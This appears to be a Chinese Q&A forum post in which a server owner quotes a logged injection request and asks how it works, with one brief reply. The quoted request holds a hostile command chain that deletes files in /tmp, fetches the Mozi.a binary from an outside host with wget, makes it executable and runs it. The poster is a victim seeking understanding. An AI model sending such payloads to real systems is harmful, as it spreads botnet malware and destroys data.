saviour337 2020-08-28 17:53 采纳率: 0%
浏览 2539

在腾讯云上的服务器收到一个注入攻击, GET /shell?cd /tmp;rm -rf *;请问下这种攻击如何实现的?

攻击的payload信息如下:
GET /shell?cd /tmp;rm -rf ;wget http://192.168.1.1:8088/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws HTTP/1.1
User-Agent: Hello, world
Host: xxx.xxx.xxx.xxx
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,/*;q=0.8
Connection: keep-alive

单单就这一个攻击请求。
就这一条get请求,应该拿不到我的shell吧,也要配合别的脚本才对吧。还有就这条下载语句也算我的网络内有192.168.1.1,但是没有它要下载的mozi.a呀,有没有哪位帮忙解释下这个攻击?

  • 写回答

2条回答 默认 最新

  • threenewbee 2020-08-28 17:59
    关注

    看什么命令来执行这一行,关键是rm -rf *会不会被当作命令执行

    评论

报告相同问题?

悬赏问题

  • ¥15 用windows做服务的同志有吗
  • ¥60 求一个简单的网页(标签-安全|关键词-上传)
  • ¥35 lstm时间序列共享单车预测,loss值优化,参数优化算法
  • ¥15 Python中的request,如何使用ssr节点,通过代理requests网页。本人在泰国,需要用大陆ip才能玩网页游戏,合法合规。
  • ¥100 为什么这个恒流源电路不能恒流?
  • ¥15 有偿求跨组件数据流路径图
  • ¥15 写一个方法checkPerson,入参实体类Person,出参布尔值
  • ¥15 我想咨询一下路面纹理三维点云数据处理的一些问题,上传的坐标文件里是怎么对无序点进行编号的,以及xy坐标在处理的时候是进行整体模型分片处理的吗
  • ¥15 一直显示正在等待HID—ISP
  • ¥15 Python turtle 画图